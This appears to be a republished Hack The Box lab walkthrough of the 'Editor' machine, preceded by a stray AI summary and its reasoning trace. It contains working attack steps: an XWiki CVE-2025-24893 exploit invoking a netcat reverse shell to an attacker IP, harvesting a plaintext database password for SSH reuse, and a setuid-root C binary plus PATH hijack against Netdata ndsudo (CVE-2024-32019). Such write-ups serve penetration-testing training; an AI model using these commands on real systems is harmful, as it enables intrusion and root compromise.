Editor — HTB Walkthrough
嗯,用户让我总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我需要通读整篇文章,抓住主要信息。 文章讲的是Hack The Box上的Editor机器,一个简单的Linux盒子。作者通过利用XWiki的CVE-2025–24893漏洞获得了xwiki用户的shell。然后发现了Netdata ndsudo插件的漏洞CVE-2024–32019,成功提权到root。这展示了过时软件和配置错误的风险。 我需要把这些关键点浓缩到100字以内。包括目标机器、漏洞利用、提权过程和总结教训。确保语言简洁明了,不使用复杂的术语。 可能的结构:介绍目标机器,初始访问方法,提权方式,以及安全教训。这样既全面又简短。 最后检查字数,确保不超过限制,并且内容准确传达文章的核心信息。 </think> 文章描述了一次针对Hack The Box平台上的Editor机器的渗透测试过程。作者通过利用XWiki的CVE-2025–24893漏洞获取初始访问权限,并进一步利用Netdata ndsudo插件的CVE-2024–32019漏洞成功提权至root。此次渗透测试展示了过时软件和配置错误可能导致的系统完全被攻陷的风险。 2026-1-4 06:28:27 Author: infosecwriteups.com(查看原文) 阅读量:8 收藏

Death Esther

Introduction

This walkthrough covers the Editor machine on Hack The Box, an Easy Linux box. I gained initial access by exploiting CVE-2025–24893 in XWiki to get a shell as the xwiki user. Further enumeration revealed a misconfigured Netdata ndsudo plugin vulnerable to CVE-2024–32019, which allowed me to escalate to root. This box demonstrates how outdated software and misconfigurations can lead to full system compromise.

Room Link: https://app.hackthebox.com/machines/Editor

Enumeration

I began by adding the target IP to my hosts file for easier access:

echo "10.10.11.80 editor.htb" | sudo tee -a /etc/hosts

Next, I ran an Nmap scan to identify open ports and services:

nmap -sV -sC -Pn 10.10.11.80

Scan results revealed:

  • 22/tcp: OpenSSH 8.9p1 (Ubuntu)
  • 80/tcp: nginx 1.18.0, redirects to http://editor.htb/
  • 8080/tcp: Jetty 10.0.20 hosting XWiki, with WebDAV enabled and several disallowed paths in robots.txt.

Visiting the XWiki instance on port 8080, I checked the version at the bottom of the page:

XWiki Version: 15.10.8

Press enter or click to view image in full size

This confirmed that XWiki 15.10.8 was running on port 8080 and would be the initial target for exploitation.

Vulnerability Identification

During enumeration, I discovered that the XWiki version 15.10.8 is vulnerable to CVE-2025–24893, which affects versions earlier than 15.10.11. This vulnerability allows remote code execution (RCE) with authenticated access. A public proof-of-concept (PoC) is available here: CVE-2025–24893 PoC.

Exploitation (Reverse Shell)

To exploit the vulnerability and gain initial access, I cloned the PoC repository and prepared a reverse shell payload:

git clone https://github.com/gunzf0x/CVE-2025-24893
cd CVE-2025-24893

Next, I executed the exploit, targeting the XWiki instance and specifying my attacker machine for the reverse shell:

python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c 'busybox nc 10.10.14.25 4444 -e /bin/bash'

On my local machine, I started a Netcat listener to catch the shell:

nc -lnvp 4444

The connection succeeded, and I obtained a shell as the xwiki user.

Get Death Esther’s stories in your inbox

Join Medium for free to get updates from this writer.

To make the shell fully interactive and easier to work with, I upgraded it to a pseudo-terminal (PTY):

python3 -c 'import pty; pty.spawn("/bin/bash")'

This allowed me to use job control, tab completion, and run commands more effectively while performing enumeration and privilege escalation.

Discovering User Credentials — oliver

While exploring the system, I noticed a home directory for another user:

cd /home
ls
# Output: oliver

Attempting to enter the directory showed that access was denied:

cd oliver
# bash: cd: oliver: Permission denied

This prompted me to look for stored credentials. Inspecting the XWiki configuration files revealed a potential password in hibernate.cfg.xml:

cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password

Output included several entries, among which one stood out:

<property name="hibernate.connection.password">theEd1t0rTeam99</property>

This indicated that the password theEd1t0rTeam99 could be used to log in as the oliver user, giving a path to escalate privileges or access files in their home directory.

User Flag.txt

Using the credentials discovered in the XWiki configuration, I was able to SSH into the machine as oliver:

ssh [email protected]

Once logged in, I navigated to the home directory and verified the contents:

ls
# Output: user.txt

Reading the user flag confirmed initial access:

cat user.txt

Privilege Escalation

While enumerating the system for potential privilege escalation paths, I searched for SUID binaries:

find / -type f -perm -4000 -user root 2>/dev/null

This revealed a vulnerable Netdata plugin:

/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

It is susceptible to CVE-2024–32019, allowing arbitrary code execution as root.

Exploitation

On my local machine, I created a simple C exploit:

nano exploit.c

Content of exploit.c:

#include <unistd.h>
int main() {
    setuid(0); setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}

Compile it locally:

gcc exploit.c -o nvme

Transfer the binary to the target system:

scp nvme [email protected]:/tmp

Execution on Target

On the target machine, prepare and run the exploit:

cd /tmp
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

This executed the nvme binary with root privileges, giving a root shell.

Root Access & Flag

After successfully exploiting the vulnerable Netdata ndsudo plugin, I gained a root shell:

whoami
# Output: root

Navigating to the root directory, I captured the final flag:

cat /root/root.txt

Thanks for reading, and I hope this write-up helps others sharpening their penetration testing and privilege escalation skills.

Ready to level up your hacking skills?

Join Hack The Box — the ultimate platform to learn penetration testing and cyber security hands-on.


文章来源: https://infosecwriteups.com/editor-htb-walkthrough-2b29bac28300?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh